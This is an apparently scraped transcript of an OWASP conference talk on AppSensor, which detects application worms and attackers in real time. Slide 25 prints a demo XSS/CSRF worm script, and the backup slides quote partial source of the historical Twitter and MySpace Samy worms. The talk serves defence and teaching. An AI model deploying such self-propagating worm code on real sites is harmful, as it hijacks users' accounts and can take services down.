Presentation is loading. Please wait.

Presentation is loading. Please wait.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Similar presentations


Presentation on theme: "Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP."— Presentation transcript:

1 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP EU09 Poland http://www.owasp.org Real Time Defenses against Application Worms and Malicious Attackers Michael Coates AppSensor Aspect Security Michael.Coates@aspectsecurity.com http://michael-coates.blogspot.com

2 OWASP Who am I?  Michael Coates  Michael.Coates@aspectsecurity.com Michael.Coates@aspectsecurity.com  Senior Application Security Engineer @ Aspect Security  Creator & Leader OWASP AppSensor  Sporadic Security Blogger  http://michael-coates.blogspot.com http://michael-coates.blogspot.com 2

3 OWASP Agenda  Malicious Attackers  Attacking online banks is easier  Why we currently can’t catch them  How to do it right  Application Worms  Why are they bad  Detecting and preventing in real time  Demo system w/ real worm 3

4 OWASP MALICIOUS ATTACKERS Real Time Defenses Against 4

5 OWASP Attack Detection: Real vs Cyber World  Why do bank robbers get caught?  Why don’t hackers get caught? 5

6 OWASP Robbing a Bank 6 Physical Controls Electronic Monitoring Human Monitoring Instant Detection and Response Controlled Access Multi Factor Auth Transaction Verification

7 OWASP Robbing an Online Bank 7 Alternate Admin Access Partial External Controls Ineffective Monitoring No Real Time Analysis Unnecessary Partner Trust No Response Capability Single Factor Auth Limited Security Training

8 OWASP Let’s change things! Applications should…  Detect attacks  Understand normal use vs. suspicious use  Instantly identify attackers  Shutdown attackers in real time  Modify application accessibility for defense

9 OWASP But wait, we have log monitoring  Log Monitoring  Reactive process – “hey looks like we got hacked last week”  Most logs are incomplete / missing critical data 9 1.2.3.4 - - [timestamp] "GET /banking/view/account.jsp?id=12345 HTTP/1.0" 200 1.2.3.4 - - [timestamp] "POST /banking/view/UpdateAccount.jsp?id=12345 HTTP/1.0" 300 1.2.3.4 - - [timestamp] "POST /banking/view/UpdateAccount.jsp?id=55112 HTTP/1.0" 300 1.2.3.4 - - [timestamp] "POST /banking/view/account.jsp?id=55999 HTTP/1.0" 404 1.2.3.4 - - [timestamp] "GET /banking/view/account.jsp?id=12345 HTTP/1.0" 200 1.2.3.4 - - [timestamp] "POST /banking/view/UpdateAccount.jsp?id=12345 HTTP/1.0" 300 1.2.3.4 - - [timestamp] "POST /banking/view/UpdateAccount.jsp?id=55112 HTTP/1.0" 300 1.2.3.4 - - [timestamp] "POST /banking/view/account.jsp?id=55999 HTTP/1.0" 404 176 [main] INFO examples.Sort - Populating data from db 272 [main] ERROR Access denied to /user/viewAcct.jsp 376 [main] ERROR User "Joe" performed unauthorized action 425 [main] DEBUG Admin page accessed 434 [main] INFO New admin account created 176 [main] INFO examples.Sort - Populating data from db 272 [main] ERROR Access denied to /user/viewAcct.jsp 376 [main] ERROR User "Joe" performed unauthorized action 425 [main] DEBUG Admin page accessed 434 [main] INFO New admin account created

10 OWASP What about a WAF?  WAFs don’t understand application context  Custom application + Generic Solution != success 10 WAF Application /viewAccount?id=1002 /viewAccount?id=1004 No attacks here, please proceed

11 OWASP Detecting Attacks the Right Way  Detect INSIDE the Application  Automatic Detection  Comprehensive  Minimize False Positives  Understand Business Logic  Immediate Response  No Manual Efforts Required 11

12 OWASP Example Detection Point 12 String action = "viewAccount"; String targetID=Utility.safeGetParam("ID", request); if (authorized(action,targetID){ //perform action } else{ AppSensor.log (ACE1,user,request); throw new AccessControlException(); } String action = "viewAccount"; String targetID=Utility.safeGetParam("ID", request); if (authorized(action,targetID){ //perform action } else{ AppSensor.log (ACE1,user,request); throw new AccessControlException(); }

13 OWASP Detecting Malicious Users  Receive POST for page which only expects GET  Invoking unsupported/nonexistent HTTP Methods  Change of User Agent midsession  Transaction using functionality not visible to user role  Double encoded data 13

14 OWASP Auth Why does this work? Simple Math x = # of attacks needed for AppSensor to determine user is malicious y = # of probes attacker needs to find a vuln if (x { "@context": "http://schema.org", "@type": "ImageObject", "contentUrl": "http://images.slideplayer.com/10/2748880/slides/slide_14.jpg", "name": "OWASP Auth Why does this work.", "description": "Simple Math x = # of attacks needed for AppSensor to determine user is malicious y = # of probes attacker needs to find a vuln if (x

15 OWASP Detection Points Implementing AppSensor 15 Application Log Server AppSensor Brain Response Listener

16 OWASP APPLICATION WORMS Real Time Defenses Against 16

17 OWASP What about Application Worms?  Twitter Worm  Free advertising, job for creator  Numerous copy cat worms  MySpace Samy Worm  Lots of friends for Samy  …then MySpace goes down  Huge damages for site:  Remediation  Cleanup  Bad PR  Infected Users  Leverage XSS and CSRF 17

18 OWASP Detecting/Preventing an Application Worm  Fix XSS vulns. That’s good. Miss any?  Pattern matching easily foiled  Common factor?  Application leveraged by worm  (updateProfile, updateStatus, updateName)  XSS and CSRF for propagation 18

19 OWASP Case Study: Samy  MySpace Application Worm  XSS worm embedded in User Profile  Added Samy as friend  Infected viewer’s profile with XSS  Exponential Growth of Samy’s friends  10 hours – 560 friends,  13 hours – 6400 friends,  18 hours – 1,000,000 friends,  19 hours – site down for repair

20 OWASP Samy vs AppSensor  AppSensor detects uptick in addFriend usage  Compares against trended info  Automatic response initiated  Alerts Admin +%200 Add Friend Usage  Alerts Admin 2 nd time +%500 Add Friend Usage  Automatically shuts down Add Friend Feature  Result:  Worm Contained,  Add Friend Temporarily Disabled,  Site Stays Up 200% alert 500% alert Auto Defense

21 OWASP Benefits of Trend Monitoring  Detection of  Application Worms,  Scripted Attacks / Probing,  CSRF Attacks  Alerting of Excessive Activity  Selective feature shutdown for overall stability

22 OWASP Seeing is Believing  Demo Social Networking App  Defended with AppSensor Trend Monitoring 22

23 OWASP The Design Demo App Embedded AppSensor Response AppSensor “Brain” App Logs

24 OWASP The Target 24 Poorly Validated Input Unencoded Output

25 OWASP The Exploit  XSS infects victim’s “Status” with worm  CSRF adds victim as friend of Charlie 25 The WORM var img=' '; document.write("I am a worm "+img); if(document.URL!='https://localhost:8443/AppSensorDemo/updateProfile.jsp'){ xmlHttp = new XMLHttpRequest(); xmlHttp.open("POST", "https://localhost:8443/AppSensorDemo/UpdateProfile", true); xmlHttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded; charset=UTF-8' ); var attackstr=' '; sdata="status="+attackstr+"&profile=wormed"; xmlHttp.send(sdata); xmlDoc=xmlHttp.responseText; } document.close(); The WORM var img=' '; document.write("I am a worm "+img); if(document.URL!='https://localhost:8443/AppSensorDemo/updateProfile.jsp'){ xmlHttp = new XMLHttpRequest(); xmlHttp.open("POST", "https://localhost:8443/AppSensorDemo/UpdateProfile", true); xmlHttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded; charset=UTF-8' ); var attackstr=' '; sdata="status="+attackstr+"&profile=wormed"; xmlHttp.send(sdata); xmlDoc=xmlHttp.responseText; } document.close();

26 OWASP Attack Set 26 Infected Status Worm Script Charlie is “patient zero” XSS to propagate CSRF to add friend

27 OWASP First Victim - “Molly” 27 Worm Fires

28 OWASP What Just Happened? 28  Message 24  Molly opens addFriends page  Message 26  Worm tag adds Charlie as friend  Message 27  Worm updates Molly’s status with malicious code  Message 28  Redirection from successful profile update

29 OWASP Molly Infected 29 Worm Spreads CSRF Success

30 OWASP Friends Accumulate for Charlie! 30

31 OWASP Defend with AppSensor  AppSensor Policy  Notify Admin if events > 5  Disable Service if events > 10  AppSensor notices anomaly – alerts admin 31 Trend Alert: Trend greater than 5 - utilization=7 /AppSensorDemo/UpdateProfile ResponseAction: Sending Email Alert to:admin@site.com re: Service /AppSensorDemo/UpdateProfile Trend Alert: Trend greater than 5 - utilization=6 /AppSensorDemo/addFriend.jsp ResponseAction: Sending Email Alert to:admin@site.com re: Service /AppSensorDemo/addFriend.jsp Trend Alert: Trend greater than 5 - utilization=7 /AppSensorDemo/UpdateProfile ResponseAction: Sending Email Alert to:admin@site.com re: Service /AppSensorDemo/UpdateProfile Trend Alert: Trend greater than 5 - utilization=6 /AppSensorDemo/addFriend.jsp ResponseAction: Sending Email Alert to:admin@site.com re: Service /AppSensorDemo/addFriend.jsp

32 OWASP Defend with AppSensor  Anomaly continues – disable service 32 Trend Alert: Trend greater than 10 - utilization=11 /AppSensorDemo/addFriend.jsp ResponseAction: Disabling Service Trend Alert: Trend greater than 10 - utilization=11 /AppSensorDemo/UpdateProfile ResponseAction: Disabling Service Trend Alert: Trend greater than 10 - utilization=11 /AppSensorDemo/addFriend.jsp ResponseAction: Disabling Service Trend Alert: Trend greater than 10 - utilization=11 /AppSensorDemo/UpdateProfile ResponseAction: Disabling Service

33 OWASP AppSensor Defends App 33 App Server Logs AppSensorServiceController: :/AppSensorDemo/addFriend.jsp active:false AppSensorServiceController: Skipping Check for /AppSensorDemo/appsensor_locked.jsp AppSensorServiceController: Disable Service:/AppSensorDemo/updateProfile.jsp for 40 s AppSensorServiceController: service disabled, checking time App Server Logs AppSensorServiceController: :/AppSensorDemo/addFriend.jsp active:false AppSensorServiceController: Skipping Check for /AppSensorDemo/appsensor_locked.jsp AppSensorServiceController: Disable Service:/AppSensorDemo/updateProfile.jsp for 40 s AppSensorServiceController: service disabled, checking time

34 OWASP Users are Protected from Worm 34 ----Validating Login of sue--- AppSensorServiceController: :/AppSensorDemo/friends.jsp active:true AppSensorServiceController: :/AppSensorDemo/addFriend.jsp active:false Not Active, redirecting to locked page AppSensorServiceController: :/AppSensorDemo/UpdateProfile active:false Not Active, redirecting to locked page ----Validating Login of sue--- AppSensorServiceController: :/AppSensorDemo/friends.jsp active:true AppSensorServiceController: :/AppSensorDemo/addFriend.jsp active:false Not Active, redirecting to locked page AppSensorServiceController: :/AppSensorDemo/UpdateProfile active:false Not Active, redirecting to locked page Worm Still Fires AppSensor protects Sue

35 OWASP Worm Contained, Site Stays Up 35

36 OWASP What’s Under the Hood? 36  Usage filter tracks feature usage  isActive filter allows/denies feature access

37 OWASP What’s Under the Hood? 37  REST communication between AppSensor & App  Support Response Actions:  Warn user, logout user, disable user, etc Application Log Server AppSensor Brain Response Listener

38 OWASP AppSensor Brain  Drools - Rule Based System  Support for complex rule sets – much more than just counting feature usage  Evaluates objects in Drools memory 38 rule "Trend Monitor 2" when $t2 : TrendMonitor(utilization > 10) then System.out.println("Trend Alert: >10 utilization="+$t2.getUtilization()+" "+ $t2.getResource()); org.owasp.AppSensor.ResponseAction.disableService($t2.getResource(),40,"s"); end

39 OWASP Future Plans for AppSensor  Live Site of Demo App  Attacker Detection  Worm Detection  Release of AppSensor Code  Update to AppSensor Guide 39

40 OWASP Questions? michael.coates@aspectsecurity.com http://www.owasp.org/index.php/Category:OWASP_AppSensor_Project http://michael-coates.blogspot.com 40

41 OWASP  Backup 41

42 OWASP Twitter Worm function XHConn() { var xmlhttp, bComplete = false; try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { try { xmlhttp = new XMLHttpRequest(); } catch (e) { xmlhttp = false; }}} if (!xmlhttp) return null; this.connect = function(sURL, sMethod, sVars, fnDone) { if (!xmlhttp) return false; bComplete = false; sMethod = sMethod.toUpperCase(); try { if (sMethod == "GET") { xmlhttp.open(sMethod, sURL+"?"+sVars, true); sVars = ""; } else { xmlhttp.open(sMethod, sURL, true); xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1"); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); } xmlhttp.onreadystatechange = function(){ if (xmlhttp.readyState == 4 && !bComplete) { bComplete = true; fnDone(xmlhttp); }}; xmlhttp.send(sVars); } catch(z) { return false; } return true; }; return this; } 42 function urlencode( str ) { var histogram = {}, tmp_arr = []; var ret = str.toString(); var replacer = function(search, replace, str) { var tmp_arr = []; tmp_arr = str.split(search); return tmp_arr.join(replace); }; histogram["'"] = '%27'; histogram['('] = '%28'; histogram[')'] = '%29'; histogram['*'] = '%2A'; histogram['~'] = '%7E'; histogram['!'] = '%21'; histogram['%20'] = '+'; ret = encodeURIComponent(ret); for (search in histogram) { replace = histogram[search]; ret = replacer(search, replace, ret) } return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) { return "%"+m2.toUpperCase(); }); return ret; } var content = document.documentElement.innerHTML; userreg = new RegExp(/ { "@context": "http://schema.org", "@type": "ImageObject", "contentUrl": "http://images.slideplayer.com/10/2748880/slides/slide_42.jpg", "name": "OWASP Twitter Worm function XHConn() { var xmlhttp, bComplete = false; try { xmlhttp = new ActiveXObject( Msxml2.XMLHTTP ); } catch (e) { try { xmlhttp = new ActiveXObject( Microsoft.XMLHTTP ); } catch (e) { try { xmlhttp = new XMLHttpRequest(); } catch (e) { xmlhttp = false; }}} if (!xmlhttp) return null; this.connect = function(sURL, sMethod, sVars, fnDone) { if (!xmlhttp) return false; bComplete = false; sMethod = sMethod.toUpperCase(); try { if (sMethod == GET ) { xmlhttp.open(sMethod, sURL+ +sVars, true); sVars = ; } else { xmlhttp.open(sMethod, sURL, true); xmlhttp.setRequestHeader( Method , POST +sURL+ HTTP/1.1 ); xmlhttp.setRequestHeader( Content-Type , application/x-www-form-urlencoded ); } xmlhttp.onreadystatechange = function(){ if (xmlhttp.readyState == 4 && !bComplete) { bComplete = true; fnDone(xmlhttp); }}; xmlhttp.send(sVars); } catch(z) { return false; } return true; }; return this; } 42 function urlencode( str ) { var histogram = {}, tmp_arr = []; var ret = str.toString(); var replacer = function(search, replace, str) { var tmp_arr = []; tmp_arr = str.split(search); return tmp_arr.join(replace); }; histogram[ ] = %27 ; histogram[ ( ] = %28 ; histogram[ ) ] = %29 ; histogram[ * ] = %2A ; histogram[ ~ ] = %7E ; histogram[ ! ] = %21 ; histogram[ %20 ] = + ; ret = encodeURIComponent(ret); for (search in histogram) { replace = histogram[search]; ret = replacer(search, replace, ret) } return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) { return % +m2.toUpperCase(); }); return ret; } var content = document.documentElement.innerHTML; userreg = new RegExp(/

43 OWASP MySpace Worm 0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=- 1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form- urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. '}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes',' ');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoke n='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profil e.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2( '/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www- form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"> 43


Download ppt "Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP."

Similar presentations


Ads by Google